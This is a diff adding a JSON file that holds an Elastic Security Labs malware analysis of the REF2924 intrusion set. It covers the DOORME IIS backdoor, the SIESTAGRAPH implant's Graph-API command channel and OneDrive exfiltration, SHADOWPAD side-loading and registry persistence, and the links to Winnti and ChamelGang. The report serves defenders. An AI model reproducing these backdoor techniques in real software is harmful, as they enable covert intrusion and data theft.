+ "id": "security_labs_content-unveiling_malware_behavior_trends-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-update_to_the_ref2924_intrusion_set_and_related_campaigns-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-update_to_the_ref2924_intrusion_set_and_related_campaigns-md.json
new file mode 100644
index 00000000000..42825da0e33
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-update_to_the_ref2924_intrusion_set_and_related_campaigns-md.json
@@ -0,0 +1,49 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Update to the REF2924 intrusion set and related campaigns\"\nslug: \"update-to-the-REF2924-intrusion-set-and-related-campaigns\"\ndate: \"2023-02-07\"\nsubtitle: \"Elastic Security Labs is providing an update to the active intrusions using SIESTAGRAPH, DOORME, and SHADOWPAD, including malware analysis and associations with additional campaigns.\"\ndescription: \"Elastic Security Labs is providing an update to the REF2924 research published in December of 2022. This update includes malware analysis of the implants, additional findings, and associations with other intrusions.\"\nauthor:\n - slug: salim-bitam\n - slug: remco-sprooten\n - slug: cyril-francois\n - slug: andrew-pease\n - slug: devon-kerr\n - slug: seth-goodwin\nimage: \"photo-edited-02@2x.jpg\"\ncategory:\n - slug: attack-pattern\ntags:\n - ref2924\n - siestagraph\n - doorme\n - shadowpad\n - winnti\n - chamelgroup\n - apt41\n---\n\n## Key takeaways\n\n- DOORME is a malicious IIS module that provides remote access to a contested network.\n- SIESTAGRAPH interacts with Microsoft’s GraphAPI for command and control using Outlook and OneDrive.\n- SHADOWPAD is a backdoor that has been used in multiple campaigns attributed to a regional threat group with non-monetary motivations.\n- REF2924 analytic update incorporating third-party and previously undisclosed incidents linking the REF2924 adversary to Winnti Group and ChamelGang along technical, tactical, and victim targeting lines.\n\n## Preamble\n\nThis research highlights the capabilities and observations of the two backdoors, named \"DOORME\" and \"SIESTAGRAPH\", and a backdoor called “SHADOWPAD” that was [disclosed by Elastic](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) in December of 2022. DOORME is an IIS (Internet Information Services) backdoor module, which is deployed to web servers running the IIS software. 
SIESTAGRAPH is a .NET backdoor that leverages the Microsoft Graph interface, a collection of APIs for accessing various Microsoft services. SHADOWPAD is an actively developed and maintained modular remote access toolkit.\n\nDOORME, SIESTAGRAPH, and SHADOWPAD each implement different functions that can be used to gain and maintain unauthorized access to an environment. These functionalities will be described in further detail in this research publication. It is important to note that these backdoors can be used to steal sensitive information, disrupt operations, and gain a persistent presence in a victim environment.\n\nAdditionally, we will discuss the relationships between REF2924 and three other intrusions carried out by the same threat group, intrusion set, or both. These associations are made using first-party observations and third-party reporting. They have allowed us to state with moderate confidence that SIESTAGRAPH, DOORME, SHADOWPAD, and other elements of REF2924 are attributed to a regional threat group with non-monetary motivations.\n\n> **Additional information on the REF2924 intrusion set**: For additional information on this intrusion set, which includes our initial disclosure as well as details of the campaign targeting the Foreign Ministry of an ASEAN member state, check out our [previous research into REF2924](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry).\n\n## DOORME code analysis\n\n### Introduction to backdoored IIS modules\n\n[IIS](https://www.iis.net/), developed by Microsoft, is an extensible web server software suite that serves as a platform for hosting websites and server-side applications within the Windows environment. With version 7.0, Microsoft equipped IIS with a modular architecture that allows for the dynamic inclusion or exclusion of modules to suit various functional requirements. 
These modules correspond to specific features that the server can utilize to handle incoming requests.\n\nAs an example, a backdoored module that overrides the [**OnGlobalPreBeginRequest**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method) event can be used to perform various malicious activities - such as capturing sensitive user information submitted to webpages, injecting malicious code into content served to visitors, or providing the attacker remote access to the web server. It is possible that a malicious module could intercept and modify a request before it is passed on to the server, adding an HTTP header or query string parameter that includes malicious code. When the server processes that modified request, the malicious code might be executed, allowing the attacker to gain unauthorized access or control the server and its resources.\n\nAdding to the danger, IIS backdoors can be stealthy, and organizations may not be aware that they have been compromised. Many companies do not have the resources or expertise to regularly monitor and test their IIS modules for vulnerabilities and malicious code, which can make it difficult to detect and remediate backdoors. To mitigate these risks, organizations should maintain a comprehensive inventory of all IIS modules and implement network and endpoint protection solutions to help detect and respond to malicious activities. Elastic Security Labs has seen increased use of this persistence mechanism coupled with defense evasions, which may disproportionately impact those hosting on-premises servers running IIS.\n\n### Introduction to the DOORME IIS module\n\nDOORME is a native backdoor module that is loaded into a victim's IIS infrastructure and used to provide remote access to the target infrastructure. 
We [first discussed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) the DOORME sample that we observed targeting the Foreign Ministry of an ASEAN member nation in December of 2022.\n\nDOORME uses the [**RegisterModule**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/pfn-registermodule-function) function, which is an export of a malicious C++ DLL module and is responsible for loading the module and setting up event handler methods. It also dynamically resolves API libraries that will be used later. The main functionality of the backdoor is implemented in the [**CGlobalModule**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-class) class and its event handler, [**OnGlobalPreBeginRequest**](https://learn.microsoft.com/en-us/previous-versions/iis/smooth-streaming-client/cglobalmodule-onglobalprebeginrequest-method). This event handler is overridden by DOORME, allowing it to be loaded before a web request enters the IIS pipeline. The core functions of the backdoor (including cookie validation, parsing commands, and calling underlying command functions) are all located within this event handler. DOORME uses multiple obfuscation methods, an authentication mechanism, an AES encryption implementation, and a purpose-built series of commands.\n\nThis diagram illustrates the contrast between an attacker attempting to connect to a backdoored IIS server and a legitimate user simply trying to access a webpage.\n\n\n\n### Obfuscation\n\n#### String obfuscation\n\nDOORME XOR-encrypts strings to evade detection. These encrypted strings are then stored on the memory stack. As the original plaintext is obscured, this string obfuscation makes it more difficult for security software or researchers to understand the purpose or meaning of the strings. 
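DOORME's scheme, in which the first byte of each encrypted blob serves as the XOR key for the remaining bytes, can be sketched as follows (a minimal illustration, not DOORME's actual code; the function names are ours):

```python
def xor_decrypt_blob(blob: bytes) -> bytes:
    """Decrypt a blob whose first byte is the XOR key for the rest."""
    key, payload = blob[0], blob[1:]
    return bytes(b ^ key for b in payload)


def xor_encrypt_blob(plaintext: bytes, key: int) -> bytes:
    """Inverse helper, included only to demonstrate the round trip."""
    return bytes([key]) + bytes(b ^ key for b in plaintext)
```

Because the key travels with the ciphertext, this scheme provides no real confidentiality; its only purpose is to keep plaintext strings out of static scans.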
The malware uses the first byte of every encrypted blob to XOR-decrypt the strings.\n\n\n\n#### Anti-disassembly technique\n\nThe malware employs a technique that can cause disassemblers to incorrectly split functions in the code, which leads to the generation of incorrect assembly graphs. This technique can make it more challenging for analysts to understand the malware's behavior and create an effective defense against it.\n\n\n\n#### Control flow obfuscation\n\nThe malware in question also employs a technique known as [Control Flow Obfuscation (CFO)](https://unprotect.it/technique/obscuring-control-flow/) to complicate the analysis of its behavior. CFO is a technique where the flow of instructions in the code is deliberately manipulated to make it more difficult for security software and researchers to understand the malware's functionality.\n\nThe malware uses CFO to complicate the analysis process, but it is noteworthy that this technique is not applied to the entire codebase. From an analysis point of view, this tells us that these strings are of particular importance to the malware author - possibly to frustrate specific security tooling. The following example serves as a demonstration of how the malware uses CFO to conceal its functionality in the context of stack string XOR decryption.\n\n\n\n#### Dynamic import table resolution obfuscation\n\nDynamic import table resolution is a technique used by malicious software to evade detection by security software. 
It involves resolving the names of the Windows APIs that the malware needs to function at runtime, rather than hard coding the addresses of these APIs in the malware's import table.\n\nDOORME first resolves the addresses of the **LoadLibraryA** and **GetProcAddress** Windows APIs by parsing the **kernel32.dll** module export table, then uses the **GetProcAddress** function to locate the desired APIs within the modules by specifying the name of the API and the name of the DLL module that contains it.\n\n\n\n### Execution flow\n\n#### Authentication\n\nThe malicious IIS module backdoor operates by looking for the string \" **79cfdd0e92b120faadd7eb253eb800d0**\" (the MD5 hash sum of a profane string) in a specific cookie of incoming HTTP requests; when found, it will parse the rest of the request.\n\n#### GET request handling\n\n**GET** requests are used to perform a status check: the malware returns the string “ **It works!”** followed by the **username** and the **hostname** of the infected machine. This serves as a means for the malware to confirm its presence on an infected machine.\n\n\n\n#### POST requests handling\n\nThe backdoor operator sends commands to the malware through HTTP POST requests as doubly encoded data: commands are AES-encrypted and then Base64-encoded, and the DOORME backdoor reverses both layers.\n\n#### Base64 implementation\n\nThe malware's implementation of Base64 uses a different index table compared to the default Base64 encoding RFC. The specific index table used by the malware is **\"VZkW6UKaPY8JR0bnMmzI4ugtCxsX2ejiE5q/9OH3vhfw1D+lQopdABTLrcNFGSy7\"** , while the normal index table used by the Base64 algorithm is **\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"**. 
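Assuming the implementation is otherwise standard Base64 and only the alphabet is remapped, the custom encoding can be undone with a simple character translation back to the standard index table, sketched here in Python:

```python
import base64

# Index tables from the analysis above
CUSTOM = "VZkW6UKaPY8JR0bnMmzI4ugtCxsX2ejiE5q/9OH3vhfw1D+lQopdABTLrcNFGSy7"
STANDARD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def doorme_b64decode(data: str) -> bytes:
    """Map the custom alphabet back to the standard one, then decode."""
    return base64.b64decode(data.translate(str.maketrans(CUSTOM, STANDARD)))


def doorme_b64encode(raw: bytes) -> str:
    """Encoder counterpart, included to demonstrate the round trip."""
    return base64.b64encode(raw).decode().translate(str.maketrans(STANDARD, CUSTOM))
```

The padding character `=` is not part of either alphabet, so the translation leaves it untouched.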
This deviation from the standard index table makes it more difficult to decode the encoded data and highlights additional custom obfuscation techniques by the DOORME malware author in an attempt to frustrate analysis.\n\n#### AES algorithm implementation\n\nThe malware uses [AES (Advanced Encryption Standard)](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) in CBC (Cipher Block Chaining) mode to encrypt and decrypt data. It uses the MD5 hash of the first 16 bytes of the authentication hash \" **79cfdd0e92b120faadd7eb253eb800d0**\" as the AES key. The initialization vector (IV) of the algorithm is the MD5 hash of the AES key.\n\nIn our case, the AES key is “ **5a430ab45c7e142c70018b99fe0d2da3”** and the AES IV is “ **57ce15b304a97772”**.\n\n### Command handling table\n\nThe backdoor is capable of executing four different commands, each with its own set of parameters. To specify which command to run and pass the necessary parameters, the operators of the backdoor use a specific syntax. The command ID and its parameters are separated by the \"pipe\" symbol ( **|** ).\n\n#### Command ID 0x42\n\nThe first command implemented has the ID **0x42** and generates a Globally Unique Identifier (GUID) by calling the API **CoCreateGuid**. This GUID identifies the infected machine, helping the attacker track victims and focus on specific high-value environments.\n\n\n\n#### Command ID 0x43\n\nAnother command, ID **0x43** , is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process. 
This functionality is achieved by utilizing the Windows native functions **NtAllocateVirtualMemory** and **NtCreateThreadEx**.\n\nThe **NtAllocateVirtualMemory** function is used to allocate memory in the same process for shellcode, while the **NtCreateThreadEx** function creates an execution thread with shellcode in that newly-allocated memory.\n\n\n\n#### Command ID 0x63\n\nCommand ID **0x63** allows the attacker to send a blob of shellcode in chunks, which the malware reassembles to execute. It works by sending this command ID with a shellcode chunk as a parameter. Implants can detect that the shellcode has been fully received when the server communicates a different shellcode size than expected. This approach allows the malware to handle large shellcode objects with minimal validation.\n\n#### Command ID 0x44\n\nCommand ID **0x44** provides a means of interacting with the shellcode being executed on the infected system. The attacker can send input to the shellcode and retrieve its output via a named pipe. This allows the attacker to control the execution of the shellcode and receive feedback, which may help to capture the output of tools deployed in the environment via the DOORME implant.\n\n### DOORME Summary\n\nIn summary, DOORME provides a dangerous capability allowing attackers to gain unauthorized access to the internal network of victims through an internet-facing IIS web server. It includes multiple obfuscation techniques to evade detection, as well as the ability to execute additional malware and tools. Malware authors are increasingly leveraging IIS modules as covert backdoors that hide deep within the system. 
To protect against these threats, it is important to continuously monitor IIS servers for any suspicious activity, processes spawned from the IIS worker process ( **w3wp.exe** ), and the creation of new executables.\n\n## SIESTAGRAPH code analysis\n\n### Introduction to the SIESTAGRAPH implant\n\nThe implant utilizes the [Microsoft Graph API](https://learn.microsoft.com/en-us/graph/overview) to access Microsoft 365 Mail and OneDrive for its C2 communication. It uses a predetermined tenant identifier and a refresh token to obtain access tokens. The implant uses the legitimate [OneDriveAPI library](https://github.com/KoenZomers/OneDriveAPI) which simplifies the process of interacting with the Microsoft API and allows for efficient management of access and refresh tokens. The implant leverages sleep timers in multiple locations as a defense evasion technique. This led to the implant’s name: SIESTAGRAPH.\n\n\n\n### Execution flow\n\nSIESTAGRAPH starts and enters its main function, which sets up the parameters needed to access the Microsoft Graph API by requesting an access token based on a hard coded refresh token.\n\nThe hard coded identifier ( **d3590ed6-52b3-4102-aeff-aad2292ab01c** ) is needed to supply access to both Microsoft 365 Mail and OneDrive.\n\n### Authentication\n\nThe SIESTAGRAPH author utilized a pre-determined tenant identifier and a refresh token to obtain access tokens. Both of these elements are essential in making a request for an access token. It is important to note that access tokens possess a limited lifespan; however, the refresh token can be utilized to request new access tokens as necessary.\n\n\n\nTo facilitate this process, the attacker utilized a third-party and legitimate library named [OneDriveAPI](https://github.com/KoenZomers/OneDriveAPI). This library simplifies the process of interacting with the Microsoft API and allows for efficient management of access and refresh tokens. 
It should be noted that although third-party libraries such as OneDriveAPI can provide a convenient way to interact with APIs, they should not be considered to be malicious.\n\n\n\nThe malware utilizes the **GetAccessTokenFromRefreshToken** method to request an authentication token. This token is then used in all subsequent API requests.\n\nRefresh tokens have a [90-day expiration window](https://learn.microsoft.com/en-us/microsoft-365/enterprise/session-timeouts?view=o365-worldwide#:~:text=The%20default%20lifetime%20for%20the%20access%20token%20is%201%20hour.%20The%20default%20max%20inactive%20time%20of%20the%20refresh%20token%20is%2090%20days). So while the access token was being used by the Graph API for C2, the refresh token, which is needed to generate new access tokens, was not used within the expiration window. The refresh token was generated on 2022-11-01T03:03:44.3138133Z and expired on 2023-01-30T03:03:44.3138133Z. This means that a new refresh token will be needed before a new access token can be generated. As the refresh token is hard coded into the malware, we can expect SIESTAGRAPH to be updated with a new refresh token if it is intended to be used in the future.\n\n### Command and control\n\nA session token ( **sessionToken** ) is created by concatenating the process ID, machine name, username, and operating system. The session token is later used to retrieve commands intended for this specific implant.\n\n\n\nAfter obtaining authentication and session tokens, the malware collects system information and exfiltrates it using a method called **sendSession**.\n\nInspecting the **sendSession** method we see that it creates an email message and saves it as a draft. Using draft messages is common C2 tradecraft as a way to avoid email interception and inspection.\n\n\n\nAfter sending the session information to the attacker, the implant enters a loop in which it will check for new commands. 
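That check-in loop can be sketched as follows. Here `fetch_commands` and `dispatch` are illustrative stand-ins for the implant's **getMessages** call and its command handling; the 5-second default and the attacker-adjustable sleep timer (the **N** and **S** commands) are taken from the analysis:

```python
import time


def beacon_loop(fetch_commands, dispatch, interval=5.0, max_checks=None):
    """Check for new commands, handle them, sleep, and repeat.

    fetch_commands() yields (name, args) tuples; max_checks bounds the
    loop for demonstration purposes (the real implant loops forever).
    """
    results, checks = [], 0
    while max_checks is None or checks < max_checks:
        for name, args in fetch_commands():
            if name in ("N", "S"):  # both update the sleep timer
                interval = float(args[0])
            else:
                results.append(dispatch(name, args))
        checks += 1
        time.sleep(interval)
    return results
```

The attacker-controlled interval is the "siesta" that gives the implant its name: longer sleeps reduce the number of Graph API calls and make the beaconing harder to spot in traffic baselines.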
By default, this beaconing interval is every 5 seconds; however, this can be adjusted by the attacker at any time.\n\nWhen receiving a command, the implant will use the **getMessages** method to check for any draft emails with commands from the attacker.\n\n\n\nWith every call that contacts the Graph API, SIESTAGRAPH will receive the current authentication token ( **authToken** ). This token is then used in the HTTP request header following the **Authorization: Bearer** ( **“Authorization”, “Bearer “ + authToken** ).\n\nEvery call to this method will contain the **sessionToken** , a command, and command arguments, separated with colons ( **:** ) ( **`::`** ).\n\nIf a command has multiple arguments, they will be split by a pipe ( **|** ). An example of this is the **rename** command where the source and destination names are split by a pipe.\n\n\n\nWe have identified the following commands:\n\n| Command text | Description |\n| -------------- | ----------------------------------------------------------------------------- |\n| C | Run a command |\n| N | Update the amount of time the binary will sleep between check-ins |\n| D | Upload a file to OneDrive |\n| U | Download item from OneDrive |\n| UU | Check if Core.bin exists, then download item from OneDrive |\n| ListDrives | Send a list of the logical drives |\n| GetDirectories | Send a list of given subdirectories |\n| GetFiles | Send a list of files in a given directory |\n| Del | Delete a given file |\n| Rename | Rename a given file or directory |\n| P | Get a list of running processes |\n| E | End the execution of the binary |\n| K | Kill a given process ID |\n| S | Update the amount of time the binary will sleep between check-ins (same as N) |\n| NET | Get network information |\n| SS | Take a screenshot |\n\nSeveral commands are self-explanatory ( **ListDrives** , **Rename** , etc.); however, the run command, sleep timer update, file upload and download, and screenshot commands are more interesting and can 
provide a better understanding of the capabilities of SIESTAGRAPH.\n\n#### C - run command\n\nWhen the **C** command is received, the malware runs the **runCommand** method. This method takes in the name of **cmd.exe** , the command line to run, and the number of milliseconds to wait for the new process to exit.\n\nIf the command parameter is not null or empty, the method proceeds to create a new instance of the **System.Diagnostics.Process** class, which is used to start and interact with a new process. It sets the properties of the process instance's **StartInfo** property, which is of the **ProcessStartInfo** class, such as the **FileName** property to the **cmd** parameter passed to the method, the **Arguments** property to **/c** concatenated with the command parameter, and also sets the **UseShellExecute** , **RedirectStandardInput** , **RedirectStandardOutput** , **RedirectStandardError** , and **CreateNoWindow** properties. As this method is only called with the hard coded value of **cmd** for the **cmd** parameter, the resulting command will always be **`cmd /c `**. This is a common way to run commands if one does not have direct access to an interactive shell.\n\n\n\n#### D - Upload to OneDrive\n\nThe **D** command is issued from the attacker’s perspective, so while they’re “downloading” from OneDrive, the host is “uploading” to OneDrive.\n\nThe method receives a **filePath** , and the authentication and session tokens. It will then upload the requested file to OneDrive. If the file is successfully uploaded, a response message is sent to the attacker using the format **OK|C:\\foo\\file.txt**.\n\nIf the upload did not succeed, the attacker will receive the error message **`OK|`**.\n\nWhile this method might seem simple, it helps to avoid detection by using common libraries while achieving the goal of exfiltrating data from the victim. 
While unconfirmed, this could be how the [exported Exchange mailboxes](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#exporting-exchange-mailboxes) were collected by the threat actor.\n\n\n\n#### U - Download from OneDrive\n\nThe download function is similar to the upload function. Again, from the attacker's perspective, the **U** command stands for upload, as the file is downloaded from OneDrive by the implant but uploaded by the attacker.\n\n#### NET - Gather network information\n\nThe **NET** command will gather network information and send it back to the attacker. To gather the information, the binary first resolves functions from two DLLs, **Ws2_32.dll** (the Windows socket API) and **iphlpapi.dll** (the Windows IP helper API).\n\n\n\nThe **NET** command gathers information about open TCP connections from the system's TCP table. It then loops over all open connections and stores the information in an array that is sent back to the attacker. This code helps the attacker get better insight into the system's purpose within the network. As an example, if there are open connections for ports 587, 993, and 995, the host could be a Microsoft Exchange server.\n\n#### SS - Take screenshot\n\nTo see the victim's desktop, SIESTAGRAPH can call the method named **TakeScreenShot** which takes a screenshot of the primary monitor and returns the screenshot as a Base64 encoded string.\n\n\n\nThis function creates a new **Bitmap** object with the width and height of the primary screen's bounds. Then it creates a new **Graphics** object from the **Bitmap** object and uses the **CopyFromScreen** function to take a screenshot and copy it to the **Graphics** object.\n\nIt then creates a new **MemoryStream** object and uses the **Save** method of the **Bitmap** object to save the screenshot as a PNG image into the memory stream. 
The image in the memory stream is then converted to a Base64 encoded string using the **Convert.ToBase64String** method. The resulting Base64 string is then sent back to the attacker by saving it as an email draft.\n\n### SIESTAGRAPH Summary\n\nSIESTAGRAPH is a purpose-built and full-featured implant that acts as a proxy for the threat actor. What makes SIESTAGRAPH more than a generic implant is that it uses legitimate and common, but adversary-controlled, infrastructure to deliver remote capabilities on the infected host.\n\n## SHADOWPAD loader code analysis\n\n### Introduction to log.dll\n\nWhen Elastic Security Labs [disclosed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry#dll-side-loading) REF2924 in December of 2022, we observed an unknown DLL. We have since collected and analyzed the DLL, concluding it is a loader for the [SHADOWPAD](https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad) malware family.\n\nThe DLL, **log.dll** , was observed on two Domain Controllers and was being side-loaded by an 11-year-old version of the Bitdefender Crash Handler (compiled name: **BDReinit.exe** ), named **13802 AR.exe** (in our example). Once executed, SHADOWPAD copies itself to **C:\\ProgramData\\OfficeDriver\\** as **svchost.exe** before installing itself as a service. Once **log.dll** is loaded, it will spawn Microsoft Windows Media Player ( **wmplayer.exe** ) and **dllhost.exe** , injecting into them, which triggers a memory shellcode detection for Elastic Defend.\n\nAt runtime, **log.dll** looks for the **log.dll.dat** file, which contains the shellcode to be executed. Then **log.dll** will encrypt and store the **shellcode** in the registry and shred the original **log.dll.dat** file. If the file doesn’t exist, it will skip this part.\n\nThen the sample will load the shellcode from the registry, RWX map it, and execute it from memory. 
If the registry key doesn’t exist, the sample will crash.\n\n### Execution flow\n\nOur version of the SHADOWPAD DLL expects to be sideloaded by an 11-year-old and vulnerable version of the BitDefender **BDReinit.exe** binary. The offset to the trampoline ([jump instructions](https://gcc.gnu.org/onlinedocs/gcc-4.7.1/gccint/Trampolines.html)) in the vulnerable application is hard coded, which means that the sample is tailored for this exact version of BitDefender’s binary (**386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd**). This side-loading behavior was previously [reported](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) by Positive Technologies.\n\n\n\nFor our analysis, we patched **log.dll** to execute without the BitDefender sideloading requirement.\n\n### Capabilities\n\n#### Obfuscation\n\n**log.dll** uses two lure functions to bypass automatic analysis.\n\nWe define lure functions as benign and not related to malware capabilities, but intended to evade defenses, obfuscate the true capabilities of the malware, and frustrate analysis. They may trick time-constrained sandbox analysis by showcasing benign behavior while exhausting the analysis interval of the sandbox.\n\n\n\n**log.dll** incorporates a code-scattering obfuscation technique to frustrate static analysis; however, this doesn't protect the binary from dynamic analysis.\n\nThis technique involves fragmenting the code into gadgets and distributing those gadgets throughout the binary. 
Each gadget is implemented as a single instruction followed by a call to a “resolver” function.\n\n\n\n\n\nThe resolver function of each call resolves the address of the next gadget and passes execution.\n\n\n\nThe obfuscation pattern is simple and a trace can be used to recover the original instructions:\n\n```\n# Keep the instruction that executes immediately after each resolver returns\nresult = []\nfor i, x in enumerate(trace):\n    if \"ret\" in x:\n        result.append(trace[i + 1])\n```\n\n#### API loading\n\nThe sample uses the common [Ldr crawling technique](https://0xevilc0de.com/2018/02/25/locating-dll-name-from-the-process-environment-block-peb/) to find the address of **kernel32.dll**.\n\n\n\n\n\nNext, **log.dll** parses the exports of **kernel32.dll** to get the address of the **LoadLibraryA** and **GetProcAddress** functions. It uses **GetProcAddress** to resolve imports as needed.\n\n#### Persistence\n\nThe sample expects to find a file called **log.dll.dat** in its root directory using the **FindFirstFile** and **FindNextFile** APIs. Once **log.dll.dat** is located, it is loaded, encrypted, and stored in the registry under the **`HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\WOW6432Node\\CLSID\\{1845df8d-241a-a0e4-02ea341a79878897}\\D752E7A8}`** registry value.\n\nThis registry value seems to be hard coded. If the file isn't found and the hard coded registry key doesn’t exist, the application crashes.\n\n\n\nOnce the contents of **log.dll.dat** have been encrypted and embedded in the registry, the original file will be deleted. 
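The store-then-load persistence flow can be sketched abstractly. This is a simulation of the logic only, not the sample's code: the single-byte XOR cipher and the dict standing in for the Windows registry are assumptions for illustration.

```python
# Simulation of SHADOWPAD's persistence flow: encrypt the payload, stash it
# under a registry value, and read it back on later runs. The XOR cipher and
# the dict "registry" are stand-ins, not the sample's actual implementation.
XOR_KEY = 0x5A  # hypothetical single-byte key


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    return bytes(b ^ key for b in data)


def store_shellcode(registry: dict, value_name: str, shellcode: bytes) -> None:
    # Encrypt and persist; the real sample then shreds log.dll.dat on disk.
    registry[value_name] = xor_bytes(shellcode)


def load_shellcode(registry: dict, value_name: str) -> bytes:
    # A missing value raises KeyError, mirroring the crash observed when the
    # hard coded registry key is absent.
    return xor_bytes(registry[value_name])


registry = {}
store_shellcode(registry, "D752E7A8", b"\x90\x90\xc3")
assert load_shellcode(registry, "D752E7A8") == b"\x90\x90\xc3"
```

Because XOR with a fixed key is its own inverse, the same routine serves both the store and load paths in this sketch.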
On subsequent runs, the shellcode will be loaded directly from the registry key.\n\n#### Shellcode\n\nTo execute the shellcode, the sample will allocate an [RWX-protected memory region](https://www.ired.team/offensive-security/defense-evasion/finding-all-rwx-protected-memory-regions) using the **VirtualAlloc** Windows API, then write the shellcode to the memory region and pass execution to it with a call through the ESI register.\n\n\n\n\n\n\n\n### Other SHADOWPAD research\n\nWhile researching shared code and techniques, Elastic Security Labs identified a [publication from SecureWorks’ CTU](https://www.secureworks.com/research/shadowpad-malware-analysis) that describes the BitDefender sideload vulnerability. Additionally, SecureWorks has shared information describing the functionality of a file, **log.dll.dat**, which is consistent with our observations. The team at [Positive Technologies ETC](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/) also [published detailed research](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) on SHADOWPAD, which aligns with our research.\n\n### SHADOWPAD Summary\n\nSHADOWPAD is a malware family that SecureWorks CTU has associated with the [BRONZE UNIVERSITY](https://www.secureworks.com/research/threat-profiles/bronze-university) threat group and Positive Technologies ETC has associated with the [Winnti group](https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf).\n\n## Campaign and adversary modeling\n\nOur analysis of Elastic telemetry, combined with open sources and compared with third-party reporting, leads us to conclude that a single nationally-aligned threat group is likely responsible. We identified relationships involving shared malware, techniques, victimology, and observed adversary priorities. 
Our confidence assessments vary depending on the sourcing and collection fidelity.\n\nWe identified significant overlaps in the work of Positive Technologies ETC and [SecureWorks CTU](https://www.secureworks.com/research/shadowpad-malware-analysis) while researching the DOORME, SIESTAGRAPH, and SHADOWPAD implants, and believe these are related activity clusters.\n\n\n\nIn the following analysis, we’ll discuss the four campaigns that we associate with this intrusion set, including sourcing, intersections, and how each supported our attribution across all campaigns.\n\n1. Winnti - reported by Positive Technologies, January 2021\n2. Undisclosed REF, Winnti - observed by Elastic Security Labs, March 2022\n3. REF2924, ChamelGang, Winnti - reported by Elastic Security Labs, December 2022\n4. Undisclosed REF, ChamelGang - observed by Elastic Security Labs, December 2022\n\n### Winnti\n\nIn January of 2021, the team at Positive Technologies ETC [published research](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/) that overlapped with our observations for REF2924: specifically, SHADOWPAD malware deployed with the file names **log.dll** and **log.dll.dat**, and using the same sample of BitDefender we observed as a DLL injection vehicle.\n\nWhile the research from Positive Technologies ETC covered a different activity cluster, the adversary deployed a similar variant of SHADOWPAD, used a similar file naming methodology, and leveraged similar procedure-level capabilities; these consistencies contribute to our conclusion that REF2924 is related. In the graphic above, we use a dashed line to represent third-party consensus and moderate confidence because, while the reporting appears thorough and sound, we cannot independently validate all findings.\n\n### Undisclosed REF, Winnti\n\nIn early 2022, Elastic observed a short-lived intrusion into a telecommunications provider in Afghanistan. 
Using code analysis and event sampling, we internally attributed these sightings to WINNTI malware implants, and external research overlaps with the [Winnti Group](https://attack.mitre.org/groups/G0044/). We continue to track this intrusion set, independently of and in relation to REF2924 observations.\n\n### REF2924, ChamelGang, Winnti\n\nIn early December 2022, we [observed](https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry) PowerShell commands used to collect and export mailboxes from an internet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations (ASEAN) member. Our research identified the presence of the DOORME backdoor, SHADOWPAD, and a new malware implant we call SIESTAGRAPH (discussed in the SIESTAGRAPH code analysis section above).\n\nIn researching the events of REF2924, we believe they are consistent with details noted by [Positive Technologies' research into ChamelGang](https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/), and likely represent the actions of one group with shared goals.\n\n### Undisclosed REF, ChamelGang\n\nUsing the DOORME IIS backdoor that we collected during research into REF2924, we developed a scanner that identified the presence of DOORME on an internet-connected Exchange server at a second telecommunications provider in Afghanistan.\n\n### Campaign associations\n\nBuilding associations between events, especially when relying on third-party reporting, is a delicate balance between surfacing value from specific observations and suppressing noise from circular reporting. Details reported by research teams and consisting of atomic indicators, techniques, procedures, and capabilities provide tremendous value in spotting associations between activity clusters. Elements of evidence that are repeated multiple times via circular reporting can lead to over-weighting that evidence. 
